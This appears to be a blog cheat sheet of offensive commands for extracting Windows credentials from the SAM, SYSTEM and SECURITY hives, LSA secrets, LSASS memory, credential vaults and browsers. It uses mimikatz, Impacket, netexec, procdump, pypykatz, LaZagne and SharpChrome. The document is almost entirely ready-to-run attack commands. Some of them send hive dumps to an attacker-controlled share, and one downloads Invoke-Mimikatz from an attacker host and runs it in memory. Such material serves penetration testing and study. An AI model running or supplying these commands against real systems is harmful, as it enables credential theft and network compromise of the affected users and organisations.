Post

CheatSheet - Windows Passwords

Posted
By Nasrallah Baadi 2 min read

SAM

SAM (Security Account Manager) is a database file in Windows that stores local user account credentials, including password hashes, and is used during the local authentication process.

1
2
3

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

1
2
3

reg.py domain.com/user:'Password123'@10.10.10.10 save -keyName 'HKLM\SAM' -o '\\attackerIP\share'
reg.py domain.com/user:'Password123'@10.10.10.10 save -keyName 'HKLM\SYSTEM' -o '\\attackerIP\share'
reg.py domain.com/user:'Password123'@10.10.10.10 save -keyName 'HKLM\SECURITY' -o '\\attackerIP\share'

We use secretsdump from Impacket to extract the password hashes locally.

1

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Dump hashes remotely with secretsdump

1

secretsdump.py administrator:Password123@10.10.10.10

Dump with netexec

1

nxc smb 10.10.10.10 -u administrator -p Password123 --sam

With mimikatz.

1

mimikatz.exe "privilege::debug" "lsadump::sam" exit

LSA

LSA (Local Security Authority) is a Windows component that handles authentication, security policies, and stores secrets like service account passwords and cached credentials.

1

nxc smb 10.10.10.10 -u administrator -p Password123 --lsa

1

mimikatz.exe "privilege::debug" "lsadump::secrets" exit

LSASS

Automated

LSASS (Local Security Authority Subsystem Service) is a Windows process responsible for enforcing security policies, handling logins, password changes, and generating access tokens. It stores live credentials in memory (e.g., passwords, hashes, tickets) for logged-in users

1

nxc smb 10.10.10.10 -u administrator -p Password123 -M lsassy

1

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Manually

Creating dump file

Using GUI

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file`

Using CLI

Identify lsass.exe PID

1
2

tasklist /fi "imagename eq lsass.exe"
Get-Process lsass

Create dump file

1
2
3

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 668 C:\lsasspower.dmp full
procdump -accepteula -ma lsass lsass.dmp
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://attacker/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Using mimikatz

1

sekurlsa::minidump lsass.dmp

Extracting secretes

Extract credentials with pypykatz

1

pypykatz lsa minidump ./lsass.dmp

Stored credentials

1

cmdkey /list

1
2
3

Lazagne.exe
mimikatz.exe "privilege::debug" "vault::cred" exit
mimikatz.exe "privilege::debug" "sekurlsa::credman" exit

Browser Passwords

1

Lazagne.exe

1

.\SharpChrome.exe logins /unprotect

Misc

Search for passwords in smb shares.

1

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

References

https://www.thehacker.recipes

https://www.netexec.wiki/

Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

CheatSheet
CheatSheet windows
This post is licensed under CC BY 4.0 by the author.